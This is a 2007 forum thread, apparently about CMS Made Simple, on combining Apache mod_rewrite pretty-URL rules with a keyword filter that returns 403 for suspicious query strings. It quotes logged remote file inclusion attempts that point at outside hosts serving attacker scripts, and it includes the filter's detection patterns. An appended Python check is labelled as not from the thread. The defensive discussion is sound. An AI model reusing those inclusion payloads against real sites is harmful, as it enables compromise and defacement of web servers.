
[SOLVED] .htaccess URL Filtering combined with Pretty URLs

Posted: Tue Sep 25, 2007 2:28 pm
by Signex
I have a website on which I'm using mod_rewrite for pretty URLs, using this code:

Options +FollowSymLinks
RewriteEngine on
RewriteBase /

# 301 Redirect all requests that don't contain a dot or trailing slash to
# include a trailing slash
RewriteCond %{REQUEST_URI} !/$
RewriteCond %{REQUEST_URI} !\.
RewriteRule ^(.*) %{REQUEST_URI}/ [R=301,L]

# Rewrites urls in the form of /parent/child/
# but only rewrites if the requested URL is not a file or directory
RewriteCond %{REQUEST_FILENAME} !-f [NC]
RewriteCond %{REQUEST_FILENAME} !-d [NC]
RewriteRule ^(.+)$ index.php?page=$1 [QSA]
This method works fine, but now I want to include some URL filtering to block potential hackers. I want to include this code:

#IF the URI contains a "http:"
RewriteCond %{REQUEST_URI} http\: [OR]

#OR if the URI contains a "["
RewriteCond %{REQUEST_URI} \[ [OR]

#OR if the URI contains a "]"
RewriteCond %{REQUEST_URI} \] [OR]

#OR if the URI contains a "<script>"
RewriteCond %{REQUEST_URI} (\<|%3C).*script.*(\>|%3E) [NC,OR]

#OR script trying to set a PHP GLOBALS variable via URL
RewriteCond %{REQUEST_URI} GLOBALS(=|\[|\%[0-9A-Z]{0,2}) [OR]

#OR any script trying to modify a _REQUEST variable via URL
RewriteCond %{REQUEST_URI} _REQUEST(=|\[|\%[0-9A-Z]{0,2}) 

RewriteRule ^.*$ - [F,L] 
So basically I end up with this when I combine both:

Options +FollowSymLinks
RewriteEngine on
RewriteBase /

#IF the URI contains a "http:"
RewriteCond %{REQUEST_URI} http\: [OR]

#OR if the URI contains a "["
RewriteCond %{REQUEST_URI} \[ [OR]

#OR if the URI contains a "]"
RewriteCond %{REQUEST_URI} \] [OR]

#OR if the URI contains a "<script>"
RewriteCond %{REQUEST_URI} (\<|%3C).*script.*(\>|%3E) [NC,OR]

#OR script trying to set a PHP GLOBALS variable via URL
RewriteCond %{REQUEST_URI} GLOBALS(=|\[|\%[0-9A-Z]{0,2}) [OR]

#OR any script trying to modify a _REQUEST variable via URL
RewriteCond %{REQUEST_URI} _REQUEST(=|\[|\%[0-9A-Z]{0,2})

RewriteRule ^.*$ - [F,L] 

# 301 Redirect all requests that don't contain a dot or trailing slash to
# include a trailing slash
RewriteCond %{REQUEST_URI} !/$
RewriteCond %{REQUEST_URI} !\.
RewriteRule ^(.*) %{REQUEST_URI}/ [R=301,L]

# Rewrites urls in the form of /parent/child/
# but only rewrites if the requested URL is not a file or directory
RewriteCond %{REQUEST_FILENAME} !-f [NC]
RewriteCond %{REQUEST_FILENAME} !-d [NC]
RewriteRule ^(.+)$ index.php?page=$1 [QSA]
Pretty URLs still work, but the URL filtering doesn't: it gives 404 errors instead of the 403 errors it should. If I try only the URL filtering on a website which doesn't use pretty URL mod_rewrite, the URL filtering works fine.

Any ideas on how I can get both URL filtering and pretty URLs to work?

Thank You.

Re: .htaccess URL Filtering combined with Pretty URLs

Posted: Tue Sep 25, 2007 5:23 pm
by Signex
Solved in this topic : http://forum.cmsmadesimple.org/index.ph ... 45.15.html

Using this code, pretty URLs and filtering work:

ErrorDocument 403 /forbidden403.html

Options +FollowSymLinks
RewriteEngine on
RewriteBase /

#IF the URI contains a "http:"
RewriteCond %{QUERY_STRING} http\: [OR]

#OR if the URI contains a "["
RewriteCond %{QUERY_STRING} \[ [OR]

#OR if the URI contains a "]"
RewriteCond %{QUERY_STRING} \] [OR]

#OR if the URI contains a "<script>"
RewriteCond %{QUERY_STRING} (\<|%3C).*script.*(\>|%3E) [NC,OR]

#OR script trying to set a PHP GLOBALS variable via URL
RewriteCond %{QUERY_STRING} GLOBALS(=|\[|\%[0-9A-Z]{0,2}) [OR]

#OR any script trying to modify a _REQUEST variable via URL
RewriteCond %{QUERY_STRING} _REQUEST(=|\[|\%[0-9A-Z]{0,2}) 

RewriteRule ^.*$ - [F,L] 

# Rewrites urls in the form of /parent/child/
# but only rewrites if the requested URL is not a file or directory
RewriteCond %{REQUEST_FILENAME} !-f 
RewriteCond %{REQUEST_FILENAME} !-d 
RewriteRule ^(.+)$ index.php?page=$1 [QSA]

Re: .htaccess URL Filtering combined with Pretty URLs

Posted: Thu Nov 22, 2007 1:30 pm
by kermit
Signex wrote: Solved in this topic : http://forum.cmsmadesimple.org/index.ph ... 45.15.html

Using this code, pretty URLs and filtering work: [same .htaccess as in the post above]
Attached is an example of how effective these few lines are...

Even if there aren't any exploitable bugs in CMSMS, there's no good reason not to add the URL filtering to your .htaccess file.

Re: .htaccess URL Filtering combined with Pretty URLs

Posted: Thu Nov 22, 2007 2:59 pm
by Pierre M.
Hello,
kermit wrote: attached is an example of how effective these few lines are...
The image shows 403s in the logs. So your rules are effective; yes, they block requests. I'd like to see what they are effective against: what are the naughty URLs they have denied access to, before they reach PHP/CMSMS?
kermit wrote: there's no good reason not to add the url filtering to you htaccess file..
Amen.

Pierre M.

Re: .htaccess URL Filtering combined with Pretty URLs

Posted: Thu Nov 22, 2007 5:00 pm
by kermit
Pierre M. wrote: I'd like to see what they are effective against: what are the naughty URLs they have denied access to, before they reach PHP/CMSMS?

Most of those were all within about 20 minutes' time... They were all one of these two (or variations of them):

218.232.75.175 - - [20/Nov/2007:18:19:49 -0800] "GET /include/main.php?config[search_disp]=true&include_dir=http://1-content.com/safe.gif? HTTP/1.1" 403 666 "-" "libwww-perl/5.79"
213.192.241.64 - - [20/Nov/2007:21:49:19 -0800] "GET /plugins/spamx/MassDelete.Admin.class.php//geeklog//plugins/spamx/BaseAdmin.class.php?_CONF[path]=http://singocrew.biz/alat/cmd.txt? HTTP/1.1" 403 666 "-" "libwww-perl/5.803"

The user agent libwww-perl would be nearly as effective to filter on (and would also nail some 'bad' bots in the process)... These clowns can deface thousands of websites in a matter of minutes, yet they have yet to master the art of faking user-agent strings to get around those types of filters?!?!
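As an added check (this script is not code from the thread), the following Python applies the six RewriteCond patterns from Signex's working .htaccess to kermit's two log lines plus one constructed benign request, showing that the payloads sit in QUERY_STRING, which the first REQUEST_URI-based attempt never examined, and that the `\[` and `\]` conditions also fire on an ordinary PHP array parameter like `page[]=2`.

```python
import re

# The six RewriteCond patterns from the working .htaccess above, keyed by the
# thread's own comment labels; the [NC] flag on the script rule becomes re.IGNORECASE.
FILTERS = {
    "http:": re.compile(r"http\:"),
    "[": re.compile(r"\["),
    "]": re.compile(r"\]"),
    "<script>": re.compile(r"(\<|%3C).*script.*(\>|%3E)", re.IGNORECASE),
    "GLOBALS": re.compile(r"GLOBALS(=|\[|\%[0-9A-Z]{0,2})"),
    "_REQUEST": re.compile(r"_REQUEST(=|\[|\%[0-9A-Z]{0,2})"),
}

# Apache combined log format; only the client IP, request target and status are extracted.
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "\S+ (?P<target>\S+) \S+" (?P<status>\d{3}) ')

# kermit's two log lines from the thread, plus one constructed benign request
# (hypothetical, not from the thread) that uses a PHP array parameter.
SAMPLE_LOG = [
    '218.232.75.175 - - [20/Nov/2007:18:19:49 -0800] "GET /include/main.php?config[search_disp]=true&include_dir=http://1-content.com/safe.gif? HTTP/1.1" 403 666 "-" "libwww-perl/5.79"',
    '213.192.241.64 - - [20/Nov/2007:21:49:19 -0800] "GET /plugins/spamx/MassDelete.Admin.class.php//geeklog//plugins/spamx/BaseAdmin.class.php?_CONF[path]=http://singocrew.biz/alat/cmd.txt? HTTP/1.1" 403 666 "-" "libwww-perl/5.803"',
    '192.0.2.10 - - [21/Nov/2007:09:00:00 -0800] "GET /news/?page[]=2 HTTP/1.1" 200 1234 "-" "Mozilla/5.0"',
]

def split_target(target):
    """REQUEST_URI is the path before the first '?'; QUERY_STRING is everything after it."""
    path, _, query = target.partition("?")
    return path, query

def matching_filters(subject):
    """Names of the RewriteCond patterns that fire on the given string."""
    return [name for name, rx in FILTERS.items() if rx.search(subject)]

def evaluate_log_line(line):
    """Which filters fire against REQUEST_URI (first attempt) vs QUERY_STRING (working fix)."""
    m = LOG_RE.match(line)
    if not m:
        return None  # not a combined-format access log line
    path, query = split_target(m.group("target"))
    return {
        "ip": m.group("ip"),
        "status": int(m.group("status")),
        "request_uri_hits": matching_filters(path),
        "query_string_hits": matching_filters(query),
    }
```

Run `evaluate_log_line` over a real access log before enabling the bracket rules: any legitimate request whose query string uses array parameters would be turned into a 403 by them.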

Re: [SOLVED] .htaccess URL Filtering combined with Pretty URLs

Posted: Fri Nov 23, 2007 5:29 pm
by Pierre M.
Thank you kermit for the feedback.
They don't fake the user agent: LOL :-D

Pierre M.